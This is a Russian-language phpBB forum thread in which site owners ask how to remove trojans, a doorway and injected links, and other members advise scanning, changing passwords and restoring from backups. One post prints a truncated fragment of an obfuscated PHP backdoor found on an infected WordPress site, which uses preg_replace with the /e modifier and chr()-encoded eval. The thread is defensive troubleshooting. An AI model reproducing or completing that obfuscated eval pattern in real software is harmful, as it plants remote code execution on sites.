Уважаемые пользователи!
C 7 ноября 2020 года phpBB Group прекратила выпуск обновлений и завершила дальнейшее развитие phpBB версии 3.2.
С 1 августа 2024 года phpBB Group прекращает поддержку phpBB 3.2 на официальном сайте.
Сайт официальной русской поддержки phpBB Guru продолжит поддержку phpBB 3.2 до 31 декабря 2024 года.
С учетом этого, настоятельно рекомендуется обновить конференции до версии 3.3.

Как убить Трояна?

Вопросы без привязки к версии. Установлена авточистка (2 года).
Правила форума
Местная Конституция | Шаблон запроса | Документация (phpBB3) | Переход на 3.0.6 и выше | FAQ | Как задавать вопросы | Как устанавливать расширения

Ваш вопрос может быть удален без объяснения причин, если на него есть ответы по приведённым ссылкам (а вы рискуете получить предупреждение ;) ).
AdmninsCluba
phpBB 1.2.1
Сообщения: 22
Стаж: 17 лет 7 месяцев
Благодарил (а): 1 раз

Как убить Трояна?

Сообщение AdmninsCluba »

обнаружено: троянская программа Trojan-Downloader.VBS.Small.dh

Почистил файл - index.php. Не помогло. Что надо сделать чтобы найти и убить скрипт?

Спасибо.

ОТВЕТ:
- проверяемся на вирусы
- меняем ВСЕ пароли и не храним их в FTP-клиенте.
- чистим файлы Index.* или заливаем из бэкапа.

http://virusinfo.info/pravila.html
Booker
phpBB 2.0.7a
Сообщения: 627
Стаж: 12 лет 10 месяцев
Благодарил (а): 17 раз
Поблагодарили: 4 раза

Re: Касперский видит вирус

Сообщение Booker »

У меня ругается всё равно.
Аватара пользователя
boroda-max
phpBB 1.4.4
Сообщения: 110
Стаж: 12 лет 1 месяц
Откуда: CCCР. Ленинград
Благодарил (а): 32 раза
Поблагодарили: 5 раз

Re: Касперский видит вирус

Сообщение boroda-max »

Запрашиваемый веб-адрес не может быть предоставлен
Веб-адрес:http://alla-doctor.info/
Заблокирован Веб-Антивирусом
Причина: опасный веб-адрес
Нажмите здесь, если считаете, что веб-страница заблокирована ошибочно.
Способ обнаружения: базы
Сообщение создано: 19:35:26

Так он и будет ругаться - пока Администратор не спишется с суппортом Касперского.....
Аватара пользователя
Balamut
Former team member
Сообщения: 2213
Стаж: 19 лет 1 месяц
Откуда: {postrow.POSTER_FROM}
Поблагодарили: 105 раз

Re: Касперский видит вирус

Сообщение Balamut »

AdmninsCluba писал(а):73dce75b0ef045f77e443a1beae076ff.php
покажите содержимое этого файла. Кто устанавливал, откуда и зачем?
//
// That's all, Folks!
// -------------------------------------------------
папа
phpBB 1.4.4
Сообщения: 106
Стаж: 12 лет 3 месяца

Re: Как убить Трояна?

Сообщение папа »

ко мне на сайт залили шелл
кто нибудь сталкивался?
Последний раз редактировалось папа 14.05.2013 16:13, всего редактировалось 1 раз.
Аватара пользователя
MIT
Former team member
Сообщения: 2500
Стаж: 15 лет 1 месяц
Откуда: 56°20′02″ с. ш. 36°42′45″ в. д.
Благодарил (а): 1 раз
Поблагодарили: 27 раз

Re: Как убить Трояна?

Сообщение MIT »

Это не шелл, а дорвей.
Удали папку нафиг и сиди ищи подозрительные файлы (вне этой папки), меняй пароли и т.д...
папа
phpBB 1.4.4
Сообщения: 106
Стаж: 12 лет 3 месяца

Re: Как убить Трояна?

Сообщение папа »

MIT писал(а):и сиди ищи подозрительные файлы
ну и как же я их найду?
Zhenjka
phpBB 1.4.1
Сообщения: 46
Стаж: 11 лет 3 месяца
Откуда: Кемерово
Благодарил (а): 1 раз

Проверка сайта на дыры

Сообщение Zhenjka »

Здравствуйте.
Есть ли какой нибудь сервис по проверке сайта на вирус и эксплойты в скриптах? Просто есть один сайт на вордпрессе, асперский стал ругаться на загрузку ссылки spraos.pw. Просмотрел что есть в интернете, прошерстил, несколько файлов удалил посторонних, но все где то еще остался. Возможно дыра есть в самом стиле, который автор сам сварганил.
P.S. Сервисы, которые предлагают в интернете проверку сайтов ругаются только на фреймы ютуба.
Аватара пользователя
Garret_Dark
phpBB 2.0.16
Сообщения: 1096
Стаж: 15 лет 3 месяца
Откуда: root/world/russia/
Благодарил (а): 18 раз
Поблагодарили: 24 раза

Re: Проверка сайта на дыры

Сообщение Garret_Dark »

Открываете исходный код страницы, где касперыч ругается, в браузере и ищите по "spraos.pw" если находите, то смотрите где размещена ссылка, далее удаляете ее из файлов форума (тут уже в зависимости от того где ссылка встраивается).
Меняете пароли на хосте, проверяетесь на вирусы и т.п.

Заодно проверьте для профилактики htaccess в корне сайта
Zhenjka
phpBB 1.4.1
Сообщения: 46
Стаж: 11 лет 3 месяца
Откуда: Кемерово
Благодарил (а): 1 раз

Re: Проверка сайта на дыры

Сообщение Zhenjka »

Garret_Dark, в том то и дело что нигде нет упоминания ссылки, искал уже. Ссылка зашифрована типа так

Код: Выделить всё

 <?php
 $auth_pass='818d0a0fd60532d7453a2b314167e6ef';preg_replace("/.*/".'e',chr(101).chr(118).chr(97).chr(108).chr(40).chr(103).chr(122).chr(105).
Аватара пользователя
MIT
Former team member
Сообщения: 2500
Стаж: 15 лет 1 месяц
Откуда: 56°20′02″ с. ш. 36°42′45″ в. д.
Благодарил (а): 1 раз
Поблагодарили: 27 раз

Re: Проверка сайта на дыры

Сообщение MIT »

Есть вот такой вот "сканер": http://www.revisium.com/ai/
Для борьбы со школьниками вполне подходит.
Zhenjka
phpBB 1.4.1
Сообщения: 46
Стаж: 11 лет 3 месяца
Откуда: Кемерово
Благодарил (а): 1 раз

Re: Как убить Трояна?

Сообщение Zhenjka »

Нашел где этот вирус сидел, на сайте стоял вордпресс и опенкарт в качестве магазина. Магазин не пользовался и просто лежал на хостинге, даже был переименован в shop1. Переименовал каталог с магазином и касперский перестал ругаться.
Я только одного не пойму, вордпресс с опенкартом никак не были связаны но вирус вылазил на стартовой странице вордпресса.
MAzZY
Бывший член :)
Сообщения: 2925
Стаж: 18 лет 11 месяцев
Благодарил (а): 20 раз
Поблагодарили: 30 раз
Забанен: Бессрочно

Re: Как убить Трояна?

Сообщение MAzZY »

Вот есть новый интересный сервис. http://webimho.ru/topic/5975/
Человек давно и плотно занимается лечение разных сайтовых взломов и заражений. Так что инструмент обещает быть хорошим. Если что-то непонятно - спрашивайте в той теме
Аватара пользователя
MIT
Former team member
Сообщения: 2500
Стаж: 15 лет 1 месяц
Откуда: 56°20′02″ с. ш. 36°42′45″ в. д.
Благодарил (а): 1 раз
Поблагодарили: 27 раз

Re: Как убить Трояна?

Сообщение MIT »

Школьникам стало нечего делать. Пошли спасать мир, не иначе.
Пусть хоть XSS с главной уберёт, а то ну совсем не серьёзно.
Zhenjka
phpBB 1.4.1
Сообщения: 46
Стаж: 11 лет 3 месяца
Откуда: Кемерово
Благодарил (а): 1 раз

Re: Как убить Трояна?

Сообщение Zhenjka »

MIT, это вы кому?
Аватара пользователя
MIT
Former team member
Сообщения: 2500
Стаж: 15 лет 1 месяц
Откуда: 56°20′02″ с. ш. 36°42′45″ в. д.
Благодарил (а): 1 раз
Поблагодарили: 27 раз

Re: Как убить Трояна?

Сообщение MIT »

Zhenjka, это я куда-то сквозь MAzZY в сторону Пыщ-Пыщ и его творения.

Вернуться в «phpBB-пространство»